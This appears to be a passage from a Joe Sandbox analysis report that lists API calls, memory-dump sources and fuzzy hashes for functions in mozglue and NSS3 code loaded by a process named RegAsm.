moz_xmalloc.MOZGLUE(-00000002,?,6CBD152B,?,?,?,?,6CBD1248,?), ref: 6CBD159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6CBD152B,?,?,?,?,6CBD1248,?), ref: 6CBD15BC
moz_xmalloc.MOZGLUE(-00000001,?,6CBD152B,?,?,?,?,6CBD1248,?), ref: 6CBD15E7
free.MOZGLUE(?,?,?,?,?,?,6CBD152B,?,?,?,?,6CBD1248,?), ref: 6CBD1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CBD152B,?,?,?,?,6CBD1248,?), ref: 6CBD1637

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 1835b0f92267ac747150a7f6c6178dae905b7355a1497c514e01036ce4da5f28
Instruction ID: ba008e5deb98ad2c4d2a33d011dd83ebf93591d6d0affcff086ef819ce641088
Opcode Fuzzy Hash: 1835b0f92267ac747150a7f6c6178dae905b7355a1497c514e01036ce4da5f28
Instruction Fuzzy Hash: C531D672A001548BC7188E78D85046E77A9FB8537872E0B6DE827DBBD4EB30F9048792

Uniqueness

Uniqueness Score: -1.00%

Function 6CD3EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CD3EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6CD3EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CD3EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CD3EEEB
free.MOZGLUE(?), ref: 6CD3EEF6

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: bbaba5c9a4be6f69d30332424af40893f2c93711e8737dc08fca1a5671955b07
Instruction ID: fce1b6164cc8f7179c1014a684c69013864aabd51608df8e45360b703a9d7ddd
Opcode Fuzzy Hash: bbaba5c9a4be6f69d30332424af40893f2c93711e8737dc08fca1a5671955b07
Instruction Fuzzy Hash: E031C2716006209BD7109F69DC447667BB4FB46744F141529E89E97EE0D731E814C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CC2AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CC3E330,?,6CBEC059), ref: 6CC2AD9D

Part of subcall function 6CBDCA10: malloc.MOZGLUE(?), ref: 6CBDCA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CC3E330,?,6CBEC059), ref: 6CC2ADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6CC3E330,?,6CBEC059), ref: 6CC2AE01
GetLastError.KERNEL32(?,00000000,?,?,6CC3E330,?,6CBEC059), ref: 6CC2AE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CC3E330,?,6CBEC059), ref: 6CC2AE3D

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: cb702d44d8254736f6474c66f78d093f6c6fe89a8ccccd24d9d633e66b4c1bb2
Instruction ID: 8b980ff7be9b3bb20574964e63d2c6cb6048e5e3a3cfff4ba7a673bf9656a28b
Opcode Fuzzy Hash: cb702d44d8254736f6474c66f78d093f6c6fe89a8ccccd24d9d633e66b4c1bb2
Instruction Fuzzy Hash: 1B3123B19002159FD710DF759D44AAFB7F8EF89614F158869E85AE7700F7349805C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6CC25EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CC3DCA0,?,?,?,6CBFE8B5,00000000), ref: 6CC25F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CBFE8B5,00000000), ref: 6CC25F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CBFE8B5,00000000), ref: 6CC25F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CBFE8B5,00000000), ref: 6CC25F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CBFE8B5,00000000), ref: 6CC25FD6

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: fe59c1e327b0750fd29bb9da5284b21892f9b1ad446b993cd31ff4b924459da8
Instruction ID: cf0fc181ce7a37d449378cc057f3ffea249fa4395c905bb0f8337997f8c3eeaf
Opcode Fuzzy Hash: fe59c1e327b0750fd29bb9da5284b21892f9b1ad446b993cd31ff4b924459da8
Instruction Fuzzy Hash: 52310E34300A008FD724DF29C898E2BB7F9FF89319BA48598E55687B99D735EC41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6CBCB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6CBCB532
moz_xmalloc.MOZGLUE(?), ref: 6CBCB55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CBCB56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CBCB57E
free.MOZGLUE(00000000), ref: 6CBCB58F

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 5f00a60af4aa2b76a8444f2c597d147103e9d8bf383091fe948302633f22705a
Instruction ID: d4b8fbe34fd824962e344e1b48e908815c9b3459a12920229c212834087b0f8d
Opcode Fuzzy Hash: 5f00a60af4aa2b76a8444f2c597d147103e9d8bf383091fe948302633f22705a
Instruction Fuzzy Hash: 9221EA71B002459BDB009F64CC50B6EBBB9FF85318F244129E918DB351E776DD15CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CBCB7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CBCB7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CBCB808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CBCB82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CBCB840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBCB849

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: fee92a8223ee54dcc0f12651b7ce741b7a075e1c4394bf009e1eba652797646d
Instruction ID: 0fb7535beb86b4831362865a0c5a2ea4f6ec3b0c142a61b29a131d3e30bd2278
Opcode Fuzzy Hash: fee92a8223ee54dcc0f12651b7ce741b7a075e1c4394bf009e1eba652797646d
Instruction Fuzzy Hash: 0A212CB0E002599FDF04DFA9D8855FEBBB4EF49318F14812AEC15A7341E731A949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD4AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6CD43FFF,00000000,?,?,?,?,?,6CD41A1C,00000000,00000000), ref: 6CD4ADA7

Part of subcall function 6CDA14C0: TlsGetValue.KERNEL32 ref: 6CDA14E0
Part of subcall function 6CDA14C0: EnterCriticalSection.KERNEL32 ref: 6CDA14F5
Part of subcall function 6CDA14C0: PR_Unlock.NSS3 ref: 6CDA150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CD43FFF,00000000,?,?,?,?,?,6CD41A1C,00000000,00000000), ref: 6CD4ADB4

Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA10F3
Part of subcall function 6CDA10C0: EnterCriticalSection.KERNEL32(?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA110C
Part of subcall function 6CDA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1141
Part of subcall function 6CDA10C0: PR_Unlock.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1182
Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6CD43FFF,?,?,?,?,6CD43FFF,00000000,?,?,?,?,?,6CD41A1C,00000000), ref: 6CD4ADD5

Part of subcall function 6CD9FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CD98D2D,?,00000000,?), ref: 6CD9FB85
Part of subcall function 6CD9FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CD9FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CE694B0,?,?,?,?,?,?,?,?,6CD43FFF,00000000,?), ref: 6CD4ADEC

Part of subcall function 6CD9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CE718D0,?), ref: 6CD9B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CD43FFF), ref: 6CD4AE3C

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: ca6211c6c4a83512ddffc96f7f38e308c401b5ea1b456f09327d05975322ba34
Instruction ID: 2a374f24692dc2c56d1ad924890844fabdc2faa3a1a4deab0adfe373feee4713
Opcode Fuzzy Hash: ca6211c6c4a83512ddffc96f7f38e308c401b5ea1b456f09327d05975322ba34
Instruction Fuzzy Hash: A7112675F00214ABE7109B659C40BBF73B89F9524CF048239ED2996651FB20E95982F2

Uniqueness

Uniqueness Score: -1.00%

Function 6CC26E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CC26E78

Part of subcall function 6CC26A10: InitializeCriticalSection.KERNEL32(6CC4F618), ref: 6CC26A68
Part of subcall function 6CC26A10: GetCurrentProcess.KERNEL32 ref: 6CC26A7D
Part of subcall function 6CC26A10: GetCurrentProcess.KERNEL32 ref: 6CC26AA1
Part of subcall function 6CC26A10: EnterCriticalSection.KERNEL32(6CC4F618), ref: 6CC26AAE
Part of subcall function 6CC26A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC26AE1
Part of subcall function 6CC26A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC26B15
Part of subcall function 6CC26A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CC26B65
Part of subcall function 6CC26A10: LeaveCriticalSection.KERNEL32(6CC4F618,?,?), ref: 6CC26B83

MozFormatCodeAddress.MOZGLUE ref: 6CC26EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC26EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC26EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CC26EFF

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 5b2b867bed542849526755f0afa4b2499a62bac766514e781bde590a339e72e8
Instruction ID: c93af2524e524225c19a6073d05bcae11074abd348fbcbfb503fce9da14051ba
Opcode Fuzzy Hash: 5b2b867bed542849526755f0afa4b2499a62bac766514e781bde590a339e72e8
Instruction Fuzzy Hash: BC21A171A0421A9FDF10DF69D88569E77F5FF84308F048079E80D97341EB749A598FA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD68E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6CD82E62,?,?,?,?,?,?,?,00000000,?,?,?,6CD54F1C), ref: 6CD68EA2

Part of subcall function 6CD8F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CD8F854
Part of subcall function 6CD8F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CD8F868
Part of subcall function 6CD8F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CD8F882
Part of subcall function 6CD8F820: free.MOZGLUE(04C483FF,?,?), ref: 6CD8F889
Part of subcall function 6CD8F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CD8F8A4
Part of subcall function 6CD8F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CD8F8AB
Part of subcall function 6CD8F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CD8F8C9
Part of subcall function 6CD8F820: free.MOZGLUE(280F10EC,?,?), ref: 6CD8F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6CD82E62,?,?,?,?,?,?,?,00000000,?,?,?,6CD54F1C), ref: 6CD68EC3
TlsGetValue.KERNEL32(?,?,?,6CD82E62,?,?,?,?,?,?,?,00000000,?,?,?,6CD54F1C), ref: 6CD68EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6CD82E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CD68EF1
PR_Unlock.NSS3 ref: 6CD68F20

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID:
API String ID: 1978757487-0
Opcode ID: dea847ac3d7d677ac5d7fc0a2aa7873c7ecec3711e8a0ea86171c70a44d199f1
Instruction ID: 45459a095bc6ded939275e86fb786c549f495fe90260bdf856aa0ae2507e2231
Opcode Fuzzy Hash: dea847ac3d7d677ac5d7fc0a2aa7873c7ecec3711e8a0ea86171c70a44d199f1
Instruction Fuzzy Hash: A6216B70A09705DFC700AF2AD584199BBF0FF49318F41456EE8989BB61DB30E854CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6CC276C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6CC276F2
moz_xmalloc.MOZGLUE(00000001), ref: 6CC27705

Part of subcall function 6CBDCA10: malloc.MOZGLUE(?), ref: 6CBDCA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CC27717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CC2778F,00000000,00000000,00000000,00000000), ref: 6CC27731
free.MOZGLUE(00000000), ref: 6CC27760

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 2538299546-0
Opcode ID: f5e2cfd98400dc4a56df23663229c742cfb9b8e35bee58a39714990fa7c1b85e
Instruction ID: 3c0fa2a909eb536dc9fd0a47974c0ba15d82f62d965493837f2e5e6fa2b404a3
Opcode Fuzzy Hash: f5e2cfd98400dc4a56df23663229c742cfb9b8e35bee58a39714990fa7c1b85e
Instruction Fuzzy Hash: B711B2B19012256BE710AF76DC44BAFBEF8EF45754F044529F888A7300F775985487E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD58FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6CD60710), ref: 6CD58FF1
PR_CallOnce.NSS3(6CEA2158,6CD59150,00000000,?,?,?,6CD59138,?,6CD60710), ref: 6CD59029
calloc.MOZGLUE(00000001,00000000,?,?,6CD60710), ref: 6CD5904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6CD60710), ref: 6CD59066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6CD60710), ref: 6CD59078

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: 9bee4add558377f44e469b5872db6bb3d23acf88a3a18ec90f8e7a1238dcb12a
Instruction ID: 2c26632c3a3de658a288ac9384a5c983ce6016e7a086da66eb7ab005019b28e6
Opcode Fuzzy Hash: 9bee4add558377f44e469b5872db6bb3d23acf88a3a18ec90f8e7a1238dcb12a
Instruction Fuzzy Hash: A211E9A17001119BEF101BADAC44A6A73B8DB827ACF940921FD49C6E60F767CD6683A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD6CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6CD81E10: TlsGetValue.KERNEL32 ref: 6CD81E36
Part of subcall function 6CD81E10: EnterCriticalSection.KERNEL32(?,?,?,6CD5B1EE,2404110F,?,?), ref: 6CD81E4B
Part of subcall function 6CD81E10: PR_Unlock.NSS3 ref: 6CD81E76

free.MOZGLUE(?,6CD6D079,00000000,00000001), ref: 6CD6CDA5
PK11_FreeSymKey.NSS3(?,6CD6D079,00000000,00000001), ref: 6CD6CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CD6D079,00000000,00000001), ref: 6CD6CDCF
DeleteCriticalSection.KERNEL32(?,6CD6D079,00000000,00000001), ref: 6CD6CDE2
free.MOZGLUE(?), ref: 6CD6CDE9

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 67610e3a474b4a48717c746a3d1e639d1fe2a586081dc106c7d52ca991aad36a
Instruction ID: 1d26ccb747d11e960dc9354952b5d39c1d6d304552a6c54dd008e6331ff6f28d
Opcode Fuzzy Hash: 67610e3a474b4a48717c746a3d1e639d1fe2a586081dc106c7d52ca991aad36a
Instruction Fuzzy Hash: 781182B2B01115BBDF00AF66EC45996B77CFF44269B144122E91987E21E732F474CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CDD2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CDD5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CDD5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CDD2CEC

Part of subcall function 6CDEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDEC2BF

PR_EnterMonitor.NSS3(?), ref: 6CDD2D02
PR_EnterMonitor.NSS3(?), ref: 6CDD2D1F
PR_ExitMonitor.NSS3(?), ref: 6CDD2D42
PR_ExitMonitor.NSS3(?), ref: 6CDD2D5B

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 0eb150d9ab1feaa3e4156998e26d64b9ba9ef12da2b2f8cf21dfbadaafd0eb52
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: A501A1F1E00204ABE6309F29FC40B87B7B5EF4531CF114529E99986730E632F82987E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CDD2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CDD5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CDD5B56

